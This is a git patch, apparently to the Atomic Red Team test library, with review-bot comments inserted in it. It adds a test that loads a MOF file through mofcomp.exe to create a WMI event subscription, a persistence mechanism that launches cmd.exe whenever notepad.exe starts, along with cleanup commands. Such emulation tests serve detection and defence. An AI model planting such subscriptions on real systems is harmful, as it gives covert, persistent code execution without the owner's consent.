From 76ef8e6e11cf89ae720731279770f036e64f8082 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Tue, 19 Jul 2022 07:47:26 -0600
Subject: [PATCH 1/2] Adding MOFComp to T1546.003

---
 atomics/T1546.003/T1546.003.yaml | 39 ++++++++++++++++++++++++++++-
 atomics/T1546.003/src/T1546.003.mof | 22 ++++++++++++++++
 2 files changed, 60 insertions(+), 1 deletion(-)
 create mode 100644 atomics/T1546.003/src/T1546.003.mof

diff --git a/atomics/T1546.003/T1546.003.yaml b/atomics/T1546.003/T1546.003.yaml
index 8c365a9e..3b72fc1c 100644
--- a/atomics/T1546.003/T1546.003.yaml
+++ b/atomics/T1546.003/T1546.003.yaml
@@ -81,4 +81,41 @@ atomic_tests:
 $EventConsumerToCleanup | Remove-WmiObject
 $EventFilterToCleanup | Remove-WmiObject
 name: powershell
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
+- name: Windows MOFComp.exe Load MOF File
+ description: |
+ The following Atomic will utilize MOFComp.exe to load a local MOF file.
+ The Managed Object Format (MOF) compiler parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
+ To query for the class: gwmi __eventfilter -namespace root\subscription
+ A successful execution will add the class to WMI root namespace.
+ Reference: https://pentestlab.blog/2020/01/21/persistence-wmi-event-subscription/ and https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mofcomp_path:
+ description: Location of mofcomp.exe
+ type: String
+ default: c:\windows\system32\wbem\mofcomp.exe
+ mof_file:
+ description: Local location MOF file
+ type: String
+ default: PathToAtomicsFolder\T1546.003\src\T1546.003.mof
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ MofComp.exe must exist on disk at specified location (#{mofcomp_path})
+ prereq_command: |
+ if (Test-Path "#{mofcomp_path}") { exit 0} else { exit 1}
+ get_prereq_command: |
+ Validate MOFComp.exe is on disk somewhere and update input argument.
+ executor:
+ command: |
+ #{mofcomp_path} #{mof_file}
+ cleanup_command: |
+ $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam_consumer'"
+ $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam_filter'"
+ $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
+ $FilterConsumerBindingToCleanup | Remove-WmiObject
+ $EventConsumerToCleanup | Remove-WmiObject
+ $EventFilterToCleanup | Remove-WmiObject
+ name: powershell
\ No newline at end of file
diff --git a/atomics/T1546.003/src/T1546.003.mof b/atomics/T1546.003/src/T1546.003.mof
new file mode 100644
index 00000000..4a80a2b0
--- /dev/null
+++ b/atomics/T1546.003/src/T1546.003.mof
@@ -0,0 +1,22 @@
+#PRAGMA AUTORECOVER
+#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
+instance of CommandLineEventConsumer as $Cons
+{
+ Name = "AtomicRedTeam_consumer";
+ RunInteractively=false;
+ CommandLineTemplate="cmd.exe";
+};
+instance of __EventFilter as $Filt
+{
+ Name = "AtomicRedTeam_filter";
+ EventNamespace = "root\\subscription";
+ Query ="SELECT * FROM __InstanceCreationEvent Within 3"
+ "Where TargetInstance Isa \"Win32_Process\" "
+ "And Targetinstance.Name = \"notepad.exe\" ";
+ QueryLanguage = "WQL";
+};
+instance of __FilterToConsumerBinding
+{
+ Filter = $Filt;
+ Consumer = $Cons;
+};
\ No newline at end of file

From f230160f64ad4447bc72ed434d37bba9f0865e6a Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Tue, 19 Jul 2022 07:58:51 -0700
Subject: [PATCH 2/2] Update T1546.003.mof

---
 atomics/T1546.003/src/T1546.003.mof | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
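Review bot: The new test ends at `name: powershell` with no `elevation_required` field, although the test directly above it (whose `elevation_required: true` is the first added line of this hunk) declares one, and writing consumer/filter/binding instances into root\subscription presumably fails without administrator rights; add `elevation_required: true` after `name: powershell` so the runner requests elevation like the sibling test does. The `get_prereq_command` body is prose (`Validate MOFComp.exe is on disk somewhere and update input argument.`) that PowerShell will try to execute as a command; make it a real statement, e.g. `Write-Host "Validate MOFComp.exe is on disk and update the mofcomp_path input argument"`. The description line `A successful execution will add the class to WMI root namespace.` does not match the MOF shipped in the same commit, which targets root\subscription; `A successful execution will add the consumer, filter and binding instances to the root\subscription namespace.` would agree with the gwmi query on the line above it.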
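Review bot: `#PRAGMA AUTORECOVER` on the first line asks mofcomp to register this file for replay when the WMI repository is rebuilt, and as far as I can tell nothing in the YAML's cleanup_command (it only removes the three instances by name) undoes that registration, so the test leaves a residual artifact after cleanup. Unless autorecover is the behaviour the test is meant to demonstrate, drop the pragma, or state in the YAML description that the autorecover registration remains and extend the cleanup to cover it. A `//` comment at the top of the file saying that the instance names `AtomicRedTeam_consumer` and `AtomicRedTeam_filter` are the ones the YAML cleanup_command looks up would help anyone editing either file.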
diff --git a/atomics/T1546.003/src/T1546.003.mof b/atomics/T1546.003/src/T1546.003.mof
index 4a80a2b0..6cae489f 100644
--- a/atomics/T1546.003/src/T1546.003.mof
+++ b/atomics/T1546.003/src/T1546.003.mof
@@ -10,7 +10,7 @@ instance of __EventFilter as $Filt
 {
 Name = "AtomicRedTeam_filter";
 EventNamespace = "root\\subscription";
- Query ="SELECT * FROM __InstanceCreationEvent Within 3"
+ Query ="SELECT * FROM __InstanceCreationEvent Within 3 "
 "Where TargetInstance Isa \"Win32_Process\" "
 "And Targetinstance.Name = \"notepad.exe\" ";
 QueryLanguage = "WQL";
@@ -19,4 +19,4 @@ instance of __FilterToConsumerBinding
 {
 Filter = $Filt;
 Consumer = $Cons;
-};
\ No newline at end of file
+};